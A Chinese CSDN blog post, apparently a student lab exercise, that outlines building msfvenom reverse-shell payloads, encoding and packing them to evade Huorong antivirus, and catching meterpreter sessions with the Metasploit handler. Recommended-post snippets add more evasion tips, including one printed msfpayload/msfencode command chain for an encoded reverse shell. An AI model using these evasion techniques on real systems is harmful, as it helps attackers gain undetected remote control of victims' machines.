Linux 远程控制

已于 2023-06-08 16:27:02 修改
阅读量97 收藏
点赞数
文章标签: linux 服务器 网络协议
于 2023-06-08 16:07:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/abdiltip047/article/details/131109829
版权
该文描述了如何使用msfvenom生成普通和免杀payload,通过调整编码级别来避免被火绒杀毒软件检测。接着,对payload进行加壳处理,并在装有火绒杀毒的虚拟机上测试其能否成功连接到主控端。最后,通过metasploit的handler模块监听和发起攻击,检查payload的有效性。
摘要由CSDN通过智能技术生成

6.1 msfvenom提供的免杀方法

步骤一:生成一个普通的payload

步骤二  :到安装了火绒杀毒软件的虚拟机下载攻击载荷。

步骤三:生成一个免杀的payload

2、使用评级为low的编码方式/x86/nonalpha生成一个免杀的payload

3、使用评级为excellent的编码方式生成一个免杀的payload

 (2)执行第2次(采用默认的1次编码):

 (3)执行第3次(使用多次编码、多重编码):

 步骤四:到安装了火绒杀毒软件的虚拟机下载攻击载荷。

 步骤五:对上述生成的免杀payload加壳

1、对payload02.exe加壳

 2、将payload02.exe复制为payload03exe

 步骤六:到安装了火绒杀毒软件的虚拟机下载攻击载荷。

 步骤七:测试payload.exepayload02.exepayload03.exe能不能正常连接到主控端

1、启动metasploit,进入metasploit(msf)的控制台。

2、使用handler模块,然后配置参数,发起攻击

(1)使用handler模块

(2)设置攻击载荷为windows/meterpreter/reverse_tcp

(3)设置lhost为kali的IP

(4)设置lpost为5000

(5)发起攻击

(6)目标靶机分别运行payload02.exe和payload03.exe后,kali是否建立会话?

计算机网络技术2班 阿卜力提普
关注
Kali Linux远程控制
qq_71207842的博客
06-12 2369
如果可以选择的话,你觉得黑客最希望对目标系统做些什么呢? 1、让目标系统上的服务崩溃。 2、在目标系统上执行某个程序。 3、直接控制目标系统。 是不是第3个选择是最激动人心的呢?
怎么远程控制linux,Linux远程控制
weixin_36212762的博客
05-07 1989
Linux远程控制实验背景:在实际生产环境中,Linux服务器通常是锁在机柜中的,除了初次装系统及偶尔的现场维护以外,平时都是通过远程登录的方式来进行管理。当需要从一个工作站管理数以百计的服务器主机时,远程维护的方式将更占优势,其中以SSH(Secure SHell)方式最为普遍。实验思路:1.使用ssh命令远程登入Linux服务器,使用scp、sftp安全传输文件。2.在Windows主机中使用...
远控免杀学习笔记-msfvenom工具介绍(二)
m0_49025459的博客
04-06 569
windows下⽣成32位/64位payload时需要注意:以windows/meterpreter/reverse_tcp为例,该payload默认为32位,也可使⽤-a x86选项指定。⼀般来说使⽤msfvenom⽣成的payload会单独开启⼀个进程,这种进程很容易被发现和关闭,在后期想做持久化的时候只能再使⽤ migrate,其实在⽣成payload时可直接使⽤如下命令,⽣成的payload会直接注⼊到指定进程中。jobs -K 可结束所有任务。
使用msfvenom远程控制
m0_68638628的博客
06-29 1043
msfvenom是msfpayload,msfencode集成的一个免费的、可下载的框架工具。它的优点是一个单一的工具、标准化的命令行选项、效率高,其免杀效果也不错。⑵再被控端改名为winpayload.exe复制到网站的目录(/var/www/html/)将被控端linuxpayload.elf生成到网站的目录(/var/www/html/)下。将被控端winpayload.exe生成到网站的目录(/var/www/html/)下。⑴将被控端payload.exe生成到/var/payload.exe。
远控免杀从入门到实践
混子
01-23 6408
前几天突然看到一个大佬写的免杀,就极其好奇,于是乎就看到这个大佬写的免杀并学习,把之前不懂的地方也都整明白了,特别感谢白师傅和卓师傅,这篇文章主要是远控免杀
metasploit加壳upx
天元喜羊羊的博客
05-01 6296
root@bt:~# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikat
Linux远程控制
m0_55834564的博客
08-17 1489
−主程序:/usr/sbin/sshd、/usr/bin/ssh。−scp[-r][-Pport]用户名@服务器:路径本地路径。−scp[-r][-Pport]本地路径用户名@服务器:路径。−配置文件:/etc/ssh/sshd_config。−-X:启用X转发,在本机运行对方的图形程序。−ssh[选项]...-l用户名服务器。−ssh[选项]...用户名@服务器。确认配置、启动服务−Port22。−ssh[选项]...服务器。−-p端口:连接到指定的端口。−默认端口:TCP22。−服务名称:sshd。..
基于SSH技术的Linux远程控制系统的设计与实现.pdf
09-06
"基于SSH技术的Linux远程控制系统的设计与实现" 本文旨在设计和实现基于SSH技术的Linux远程控制系统,以满足Linux和Windows操作系统之间的信息交互需求。该系统采用C#语言实现,通过在Linux服务器端设置公钥文件,...
Xftp Linux远程控制文件上传下载工具
06-10
Xftp Linux远程控制文件上传下载工具 Xftp是一个功能强大的SFTP、FTP 文件传输软件。使用了 Xftp 以后,MS Windows 用户能安全地在 UNIX/Linux 和 Windows PC 之间传输文件。Xftp 能同时适应初级用户和高级用户的...
基于Linux远程控制shell方式的原理与实现.pdf
09-06
"基于Linux远程控制shell方式的原理与实现" 本文将详细介绍基于Linux远程控制shell方式的原理与实现。远程控制是指一台计算机通过互联网、局域网、电话线等手段,以某种方式连接到另外一台计算机,同时可以在本机上...
tcps.zip_linux 远程控制_popen
09-24
总的来说,`tcps.zip_linux 远程控制_popen`项目是一个基于Linux远程控制系统,它利用了`popen`函数和管道技术,以及可能的TCP套接字通信,实现了跨主机的进程通信和远程控制功能。这个系统对于系统管理员和开发者...
远控免杀专题7 ---shellter免杀
qq_41683305的博客
03-11 868
0x01 免杀能力一览表 几点说明: 1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。 2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(201...
linux常用免杀,【kali linux】详细分析两个免杀远控 了解远控和免杀原理
weixin_42531886的博客
05-13 965
该楼层疑似违规已被系统折叠隐藏此楼查看此楼Hi 大家好 我是杰爱蓝莓今天起跟大家从源代码分析两个免杀的远控 让大家能够了解远控程序的原理,以及免杀技术实现的一些原理两个远控1:用Python语言写的 可以运行在Linux操作系统 和Windows操作系统2:用c#语言写的 可以运行在Windows操作系统首先我给大家演示一下这两个远控的使用再用360杀毒测试是否它们都是免杀的再跟...
Linux】:信号与信号产生
Yikefore的博客
09-12 969
信号的基本概念、对信号的理解、信号的多种产生方式以及核心转储的详细介绍!
Linux】ldd常见问题
zclinux的博客
09-11 1060
当你自己编译程序时,可以通过。
Linux如何使用sed命令进行文本替换
yang295242361的博客
09-12 545
Linux中,sed(Stream Editor)是一个用于处理文本流的命令行工具,它非常适合用于执行基本的文本转换。sed可以读取输入的文本文件,根据指定的指令对文本进行处理,并将结果输出到标准输出设备。
Java wrapperr打包springboot项目到linux和Windows
最新发布
欢迎查阅
09-14 1012
测试启动就是点击App.bat 就会有信息的输出 installApp就是注册为一个windows上的一个服务。上图文件复制的地方 全部复制过去 保留自己需要的 然后去掉后缀.in。下载:linux的目前免费的 windows 64位的好像收费的。前提: 一定要有Java环境(我使用的是jdk1.8)解压的目录,然后我们新建自己的项目目录java-jsw。前面是你解压的原文件 后边是你自己建的目录路径。步骤和上面的一样 不过复制的文件不一样。下载一个社区版本的应该就够用了。需要注意的点 有Java环境。
linux 中删除乱码中文名文件
她的吻让他
09-13 263
在操作linux时会不经意将带有中文的文件发送到linux系统,但是有些linux系统不能识别中文以及中文符号等,会导致linux shell命令无法操作这些文件。想要删除无法识别名字的文件,需要找到其inode 号,通过inode 删除文件。find . -inum inode号 -exec rm {} \;整体操作分为两条指令。
linux实用操作
lonelyxxyo的博客
09-13 1665
环境变量PATH这个项目里面记录了系统执行命令的搜索路径。这些搜索路径我们也可以自行添加到PATH中去。黑马教学案例:测试:在当前HOME目录内创建文件夹,myenv,在文件夹内创建文件mkhaha通过vim编辑器,在mkhaha文件内填入:echo 哈哈哈哈哈完成上述操作后,随意切换工作目录,执行mkhaha命令尝试一下,会发现无法执行修改PATH的值。
Linux远程控制关机
07-24
Linux远程控制关机通常涉及到对Linux系统的网络管理能力以及SSH协议的应用。SSH(Secure Shell)是一种安全的远程连接协议,可以用于终端会话、文件传输以及其他远程操作。 ### 使用SSH远程控制关机 #### 步骤一:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值